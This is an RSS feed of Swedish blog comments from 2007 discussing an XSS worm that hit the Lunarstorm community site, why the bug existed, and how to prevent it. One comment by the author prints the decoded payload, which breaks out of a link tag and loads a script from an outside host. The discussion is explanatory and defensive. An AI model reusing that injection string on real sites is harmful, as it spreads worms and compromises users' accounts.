<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>
<channel>
	<title>Comments on: Lunarstorm utsatt för attack</title>
	<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/</link>
	<description>Kristoffer Forsgren skriver om IT-säkerhet, ny teknik och relaterade ämnen. Då och då postas det tips och guider som kan underlätta IT-vardagen för gemene man. Det finns även gratis plugins till Wordpress att hämta.</description>
	<pubDate>Tue, 06 Jan 2009 19:37:59 +0000</pubDate>
		<item>
		<title>By: Mikael</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-10430</link>
		<dc:creator>Mikael</dc:creator>
		<pubDate>Sun, 04 May 2008 21:08:41 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-10430</guid>
		<description>Hej, Jag tycker att det är fantastikt att ni diskuterar ämnet när ni inte vet att bug stavas bug och inte "bugg". Läs på lite mer. Att veta vad XSS är inga problem.</description>
		<content:encoded><![CDATA[<p>Hej, Jag tycker att det är fantastikt att ni diskuterar ämnet när ni inte vet att bug stavas bug och inte &#8220;bugg&#8221;. Läs på lite mer. Att veta vad XSS är inga problem.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: wally</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3865</link>
		<dc:creator>wally</dc:creator>
		<pubDate>Sat, 21 Jul 2007 16:58:05 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3865</guid>
		<description>Jaha. Trodde det... Hade inte läst igenom det så noggrant men jag menade väl han som skrivit koden ;)</description>
		<content:encoded><![CDATA[<p>Jaha. Trodde det&#8230; Hade inte läst igenom det så noggrant men jag menade väl han som skrivit koden <img src='http://www.gate303.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3861</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Sat, 21 Jul 2007 07:56:35 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3861</guid>
		<description>Wally: Det är &lt;em&gt;inte&lt;/em&gt; jag som har gjort scriptet =)
Scriptet är däremot exakt detsamma som det som användes mot Lunarstorm, jag har med det här för demonstrationssyfte
</description>
		<content:encoded><![CDATA[<p>Wally: Det är <em>inte</em> jag som har gjort scriptet =)<br />
Scriptet är däremot exakt detsamma som det som användes mot Lunarstorm, jag har med det här för demonstrationssyfte</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: wally</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3858</link>
		<dc:creator>wally</dc:creator>
		<pubDate>Fri, 20 Jul 2007 21:19:17 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3858</guid>
		<description>Snyggt skript!

Du kunde gjort det lite snyggare när du skapar en XMLHttpRequest men annars måste jag säga att det ser snyggt ut.

Hur lång tid tog det från idé till utförande?

Mvh Waldemar</description>
		<content:encoded><![CDATA[<p>Snyggt skript!</p>
<p>Du kunde gjort det lite snyggare när du skapar en XMLHttpRequest men annars måste jag säga att det ser snyggt ut.</p>
<p>Hur lång tid tog det från idé till utförande?</p>
<p>Mvh Waldemar</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3838</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Wed, 18 Jul 2007 12:59:14 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3838</guid>
		<description>Jesper: Tack för stödet! =)
Det som brast i säkerheten här var att Lunarstorm skrev ut hemsidelänken precis som den blivit inskriven, utan att göra om det hela till HTML-kod.

Om du tittar i koden, under funktionen function injectscript() så ser du på femte raden där pd får ett värde tilldelat att variabeln "txtHomepage" (den återfinns i slutet på raden ovanför) sätts till ett värde som bland annat innehåller "www.hamsterpaj.net" och sedan bitvis en hel del konstiga kombinationer med % i början av dem. Detta är alltså URL-kodade tecken. Kör man hela den strängen genom en funktion som gör om dem till vanliga tecken får man fram raden: "www.hamsterpaj.net/forum/hamsterpaj/allmaent_om_hamsterpaj/foersvarstal_foer_forumet/"&#62;&#60;script /src=http://koppiem.awardspace.com/script.js&#62;&#60;/script&#62;&#60;a"

I strängen ingår alltså tecken som får själva länk-taggen att avslutas och att en komplett script-tag läggs in.

Hoppas att detta bidrog med lite ljus till situationen =)
</description>
		<content:encoded><![CDATA[<p>Jesper: Tack för stödet! =)<br />
Det som brast i säkerheten här var att Lunarstorm skrev ut hemsidelänken precis som den blivit inskriven, utan att göra om det hela till HTML-kod.</p>
<p>Om du tittar i koden, under funktionen function injectscript() så ser du på femte raden där pd får ett värde tilldelat att variabeln &#8220;txtHomepage&#8221; (den återfinns i slutet på raden ovanför) sätts till ett värde som bland annat innehåller &#8220;www.hamsterpaj.net&#8221; och sedan bitvis en hel del konstiga kombinationer med % i början av dem. Detta är alltså URL-kodade tecken. Kör man hela den strängen genom en funktion som gör om dem till vanliga tecken får man fram raden: &#8220;www.hamsterpaj.net/forum/hamsterpaj/allmaent_om_hamsterpaj/foersvarstal_foer_forumet/&#8221;&gt;&lt;script /src=http://koppiem.awardspace.com/script.js&gt;&lt;/script&gt;&lt;a&#8221;</p>
<p>I strängen ingår alltså tecken som får själva länk-taggen att avslutas och att en komplett script-tag läggs in.</p>
<p>Hoppas att detta bidrog med lite ljus till situationen =)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jesper</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3832</link>
		<dc:creator>Jesper</dc:creator>
		<pubDate>Wed, 18 Jul 2007 00:16:46 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3832</guid>
		<description>Kristoffer, du gjorde absolut inget fel i att återpublicera denna koden. Det är bara bra så att andra utvecklare kan studera hur en XSS-mask fungerar.

Men någon som vet exakt vad som brast i säkerheten? Ola skriver om att det var fel på deras länkningsskript, men hur kunde det möjliggöra att man kunde köra javascript från en extern url?

På min blogg fick jag ett tips om att skriptet eventuellt kördes här ifrån: http://pastebin.com/m439d0918 Nån som kan bekräfta det?</description>
		<content:encoded><![CDATA[<p>Kristoffer, du gjorde absolut inget fel i att återpublicera denna koden. Det är bara bra så att andra utvecklare kan studera hur en XSS-mask fungerar.</p>
<p>Men någon som vet exakt vad som brast i säkerheten? Ola skriver om att det var fel på deras länkningsskript, men hur kunde det möjliggöra att man kunde köra javascript från en extern url?</p>
<p>På min blogg fick jag ett tips om att skriptet eventuellt kördes här ifrån: <a href="http://pastebin.com/m439d0918" rel="nofollow">http://pastebin.com/m439d0918</a> Nån som kan bekräfta det?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3829</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Tue, 17 Jul 2007 16:09:59 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3829</guid>
		<description>Maria, bitvis är det svårt att utläsa exakt vad du menar, men jag ska försöka mitt bästa.

Ägaren till Hamsterpaj har uttryckt att han gärna skulle se att Lunarstorm går i konkurs ja. Jag tror inte att så många företag skulle bli ledsna om de ser sin största konkurrent försvinna. Så det finns, enligt mig, inget särskilt anmärkningsvärt i uttalandet i sig. Däremot kan man kanske anse att det var lite klumpigt formulerat.</description>
		<content:encoded><![CDATA[<p>Maria, bitvis är det svårt att utläsa exakt vad du menar, men jag ska försöka mitt bästa.</p>
<p>Ägaren till Hamsterpaj har uttryckt att han gärna skulle se att Lunarstorm går i konkurs ja. Jag tror inte att så många företag skulle bli ledsna om de ser sin största konkurrent försvinna. Så det finns, enligt mig, inget särskilt anmärkningsvärt i uttalandet i sig. Däremot kan man kanske anse att det var lite klumpigt formulerat.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: maria johansson</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3826</link>
		<dc:creator>maria johansson</dc:creator>
		<pubDate>Tue, 17 Jul 2007 14:10:02 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3826</guid>
		<description>vad jag menar är att den sajten, som blev indragen,yttrande var ganska simpelt hade ingen skuld i detta.men hade gärna sett att lunarstorm gick i konkurs,vad kallar man det, läst artiklarna i aftonbladet, hallands nyheter, har ni</description>
		<content:encoded><![CDATA[<p>vad jag menar är att den sajten, som blev indragen,yttrande var ganska simpelt hade ingen skuld i detta.men hade gärna sett att lunarstorm gick i konkurs,vad kallar man det, läst artiklarna i aftonbladet, hallands nyheter, har ni</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3817</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Mon, 16 Jul 2007 22:24:22 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3817</guid>
		<description>Maria: Det är klart att man ifrågasätter säkerhetsarbetet när det visar sig att en attack av det här slaget är möjlig. Det hade varit en barnlek att skydda sig mot den. Någonstans har säkerhetsrutinerna brustit rejält, den saken är klar. Det är fullt möjligt att jag (och kanske även de andra) skulle kunna bidra till en höjd nivå av säkerhet, men det är inte aktuellt i den här diskussionen.

Att säga att det alltid finns kryphål är fel, däremot kan man säga att risken för att det finns någon form av kryphål är ganska stor. Det här hålet är däremot av en oerhört låg nivå. Det ska helt enkelt inte finnas på en så stor sida som Lunarstorm är.

Att det här har med någon sorts "svensk avundsjuka" är nog däremot ett felaktigt antagande :)</description>
		<content:encoded><![CDATA[<p>Maria: Det är klart att man ifrågasätter säkerhetsarbetet när det visar sig att en attack av det här slaget är möjlig. Det hade varit en barnlek att skydda sig mot den. Någonstans har säkerhetsrutinerna brustit rejält, den saken är klar. Det är fullt möjligt att jag (och kanske även de andra) skulle kunna bidra till en höjd nivå av säkerhet, men det är inte aktuellt i den här diskussionen.</p>
<p>Att säga att det alltid finns kryphål är fel, däremot kan man säga att risken för att det finns någon form av kryphål är ganska stor. Det här hålet är däremot av en oerhört låg nivå. Det ska helt enkelt inte finnas på en så stor sida som Lunarstorm är.</p>
<p>Att det här har med någon sorts &#8220;svensk avundsjuka&#8221; är nog däremot ett felaktigt antagande <img src='http://www.gate303.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: maria johansson</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3816</link>
		<dc:creator>maria johansson</dc:creator>
		<pubDate>Mon, 16 Jul 2007 21:53:01 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3816</guid>
		<description>det finns alltid kryphål, i säkerhet,lunarstorm har säkert tänkt säkerhet.kristoffer o john o ola o niklas, ni verkar ju vara så insatta, kanske skulle ni kunna driva sveriges största ungdomschat.</description>
		<content:encoded><![CDATA[<p>det finns alltid kryphål, i säkerhet,lunarstorm har säkert tänkt säkerhet.kristoffer o john o ola o niklas, ni verkar ju vara så insatta, kanske skulle ni kunna driva sveriges största ungdomschat.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: maria johansson</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3815</link>
		<dc:creator>maria johansson</dc:creator>
		<pubDate>Mon, 16 Jul 2007 21:36:55 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3815</guid>
		<description>de flesta har sädana kommentarer här, angående säkerheten hos lunarstorm.ifrågande borde vara vad för slags idioter ursäkta ordvalet,som bara är ute efter att förstöra.svenska avundsjukan, har gjort sig påmind igen.</description>
		<content:encoded><![CDATA[<p>de flesta har sädana kommentarer här, angående säkerheten hos lunarstorm.ifrågande borde vara vad för slags idioter ursäkta ordvalet,som bara är ute efter att förstöra.svenska avundsjukan, har gjort sig påmind igen.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3809</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Mon, 16 Jul 2007 13:41:27 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3809</guid>
		<description>John: I slutet av artikeln skrev jag "Hur kunde Lunarstorm skyddat sig mot detta? Enkelt, genom att helt enkelt se över vilka värden man tar emot i sina fält.", kanske får lägga till lite till där.

Det är möjligt att jag skriver en mer ingående artikel om XSS-attacker framöver däremot, då det fortfarande är ett mycket vanligt attacksätt.
</description>
		<content:encoded><![CDATA[<p>John: I slutet av artikeln skrev jag &#8220;Hur kunde Lunarstorm skyddat sig mot detta? Enkelt, genom att helt enkelt se över vilka värden man tar emot i sina fält.&#8221;, kanske får lägga till lite till där.</p>
<p>Det är möjligt att jag skriver en mer ingående artikel om XSS-attacker framöver däremot, då det fortfarande är ett mycket vanligt attacksätt.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: John</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3808</link>
		<dc:creator>John</dc:creator>
		<pubDate>Mon, 16 Jul 2007 13:15:10 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3808</guid>
		<description>Kristoffer du kanske kan skriva en artikel om hur Lunarstorm skulle kunna skydda sig? Det ger väl mer än att bara ge script kiddies mer kod att leka med?</description>
		<content:encoded><![CDATA[<p>Kristoffer du kanske kan skriva en artikel om hur Lunarstorm skulle kunna skydda sig? Det ger väl mer än att bara ge script kiddies mer kod att leka med?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ola</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3804</link>
		<dc:creator>Ola</dc:creator>
		<pubDate>Mon, 16 Jul 2007 07:33:47 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3804</guid>
		<description>Anledningen till varför det va missat är för att funktionen som kodade om länkar till klickbara länkar va fel. Så om man skrev "http://www.länk.seertc" utan mellanslag så plockade den med scriptet. Mao ett misstag som tagit 4år att hitta för kidsen.</description>
		<content:encoded><![CDATA[<p>Anledningen till varför det va missat är för att funktionen som kodade om länkar till klickbara länkar va fel. Så om man skrev &#8220;http://www.länk.seertc&#8221; utan mellanslag så plockade den med scriptet. Mao ett misstag som tagit 4år att hitta för kidsen.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Code Odyssey » XSS-attacken mot Lunarstorm</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3802</link>
		<dc:creator>Code Odyssey » XSS-attacken mot Lunarstorm</dc:creator>
		<pubDate>Sun, 15 Jul 2007 23:53:33 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3802</guid>
		<description>[…] Via kommentarerna hos IDG hittade jag även en länk till gate 303 som också skriver om attacken och visar upp själva koden som användes. […]</description>
		<content:encoded><![CDATA[<p>[…] Via kommentarerna hos IDG hittade jag även en länk till gate 303 som också skriver om attacken och visar upp själva koden som användes. […]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3799</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Sun, 15 Jul 2007 17:03:21 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3799</guid>
		<description>Nickas: Grejen med just den här svagheten är att det är något man kan skydda sig mot väldigt lätt och det är också något av det första man som webbprogrammerare kontrollerar. Jag blev mycket förvånad när jag hörde talas om masken som härjade på Myspace med, även den inte berör mig personligen på samma sätt. Att det inte är ont om säkerhetshål och -brister är något jag är mycket medveten om, mina studier i IT-säkerhet har tagit min paranoia till ännu högre nivåer... =)

Alla säkerhetshål beror på den mänskliga faktorn. Någonstans är det nämligen en människa som har lyckats förbise kontruktionsmissen.

Att lösa det hela är lätt: Lita inte på användaren, kontrollera deras inmatning. :)
</description>
		<content:encoded><![CDATA[<p>Nickas: Grejen med just den här svagheten är att det är något man kan skydda sig mot väldigt lätt och det är också något av det första man som webbprogrammerare kontrollerar. Jag blev mycket förvånad när jag hörde talas om masken som härjade på Myspace med, även den inte berör mig personligen på samma sätt. Att det inte är ont om säkerhetshål och -brister är något jag är mycket medveten om, mina studier i IT-säkerhet har tagit min paranoia till ännu högre nivåer&#8230; =)</p>
<p>Alla säkerhetshål beror på den mänskliga faktorn. Någonstans är det nämligen en människa som har lyckats förbise kontruktionsmissen.</p>
<p>Att lösa det hela är lätt: Lita inte på användaren, kontrollera deras inmatning. <img src='http://www.gate303.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Niklas Fors</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3798</link>
		<dc:creator>Niklas Fors</dc:creator>
		<pubDate>Sun, 15 Jul 2007 15:46:30 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3798</guid>
		<description>Kristoffer: Jo, visst bör man väl säkerställa kvalitén på koden genom speciella rutiner. Nu är jag inte särskilt erfaren av just detta, men jag gissar på att Lunarstorm har någon form av rutiner för detta. Men vi är människor och då händer det faktiskt att vi gör fel, oavsett om det finns rutiner som egentligen skall stoppa det. 

Som du vet så är det förhållandevis vanligt med säkerhetshål. Kolla bara på masken som spred sig på Myspace. Den siten om någon borde ju ha riktiga rutiner för att det inte skall finnas några säkerhetsluckor. Men ändå hände det, och jag gissar på att svaret på varför det hände är den mänskliga faktorn. Det är människan som gör fel. 

Jag har själv skrivit en hel del kod för webben på min fritid. Jag driver en liten site som har en del användare och besökare. Och jag vet själv hur lätt det kan vara att råka missa en sådan här sak. Nu är det väl skillnad om man sitter på fritiden och arbetar med det. Men i vilket fall som helst är det rätt lätt hänt att man råkar missa en sak. 

Men du har rätt, det borde inte förekomma. Sedan hur man skall lösa det så att det absolut inte förekommer är ju en annan fråga. Jag skulle kunna gissa på att det oftast rör sig om ekonomi, att företaget inte vill lägga mer pengar på det.</description>
		<content:encoded><![CDATA[<p>Kristoffer: Jo, visst bör man väl säkerställa kvalitén på koden genom speciella rutiner. Nu är jag inte särskilt erfaren av just detta, men jag gissar på att Lunarstorm har någon form av rutiner för detta. Men vi är människor och då händer det faktiskt att vi gör fel, oavsett om det finns rutiner som egentligen skall stoppa det. </p>
<p>Som du vet så är det förhållandevis vanligt med säkerhetshål. Kolla bara på masken som spred sig på Myspace. Den siten om någon borde ju ha riktiga rutiner för att det inte skall finnas några säkerhetsluckor. Men ändå hände det, och jag gissar på att svaret på varför det hände är den mänskliga faktorn. Det är människan som gör fel. </p>
<p>Jag har själv skrivit en hel del kod för webben på min fritid. Jag driver en liten site som har en del användare och besökare. Och jag vet själv hur lätt det kan vara att råka missa en sådan här sak. Nu är det väl skillnad om man sitter på fritiden och arbetar med det. Men i vilket fall som helst är det rätt lätt hänt att man råkar missa en sak. </p>
<p>Men du har rätt, det borde inte förekomma. Sedan hur man skall lösa det så att det absolut inte förekommer är ju en annan fråga. Jag skulle kunna gissa på att det oftast rör sig om ekonomi, att företaget inte vill lägga mer pengar på det.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kristoffer</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3796</link>
		<dc:creator>Kristoffer</dc:creator>
		<pubDate>Sun, 15 Jul 2007 13:26:16 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3796</guid>
		<description>Nicklas: Jo, jag vet att det är en bugg, eller snarare en brist. ALLA attacker grundar sig på någon form av buggar eller brister, fanns det ingen bugg eller brist att attackera så skulle inga sådana här attacker genomföras. ;)

Attacker av den typen som Lunarstorm i natt blev utsatt för är något av det första man ser till att skydda sig mot i samma stund som man tillåter användare att mata in värden.

Någonstans har det med andra ord brustit i deras säkerhetskontroller, vilket i förlängningen innebär just att säkerheten blir lägre. När sådana missar görs på etablerade och stora sidor är det så klart uppseendeväckande (åtminstone i mina ögon).

Tack för din synpunkt :)
</description>
		<content:encoded><![CDATA[<p>Nicklas: Jo, jag vet att det är en bugg, eller snarare en brist. ALLA attacker grundar sig på någon form av buggar eller brister, fanns det ingen bugg eller brist att attackera så skulle inga sådana här attacker genomföras. <img src='http://www.gate303.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Attacker av den typen som Lunarstorm i natt blev utsatt för är något av det första man ser till att skydda sig mot i samma stund som man tillåter användare att mata in värden.</p>
<p>Någonstans har det med andra ord brustit i deras säkerhetskontroller, vilket i förlängningen innebär just att säkerheten blir lägre. När sådana missar görs på etablerade och stora sidor är det så klart uppseendeväckande (åtminstone i mina ögon).</p>
<p>Tack för din synpunkt <img src='http://www.gate303.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Niklas Fors</title>
		<link>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3795</link>
		<dc:creator>Niklas Fors</dc:creator>
		<pubDate>Sun, 15 Jul 2007 13:09:59 +0000</pubDate>
		<guid>http://www.gate303.net/2007/07/15/lunarstorm-utsatt-for-attack/#comment-3795</guid>
		<description>"Det är i mina ögon uppseendeväckande att en så stor sida som Lunarstorm inte hade högre säkerhet vad gäller sådant här."
Det här är en bugg, någonting de har missat. Jag tror faktiskt att deras programmerare är medvetna om vad XSS är för någonting. Min poäng är alltså att det nog inte beror på okunskap, utan på ett mänskligt misstag.</description>
		<content:encoded><![CDATA[<p>&#8220;Det är i mina ögon uppseendeväckande att en så stor sida som Lunarstorm inte hade högre säkerhet vad gäller sådant här.&#8221;<br />
Det här är en bugg, någonting de har missat. Jag tror faktiskt att deras programmerare är medvetna om vad XSS är för någonting. Min poäng är alltså att det nog inte beror på okunskap, utan på ett mänskligt misstag.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
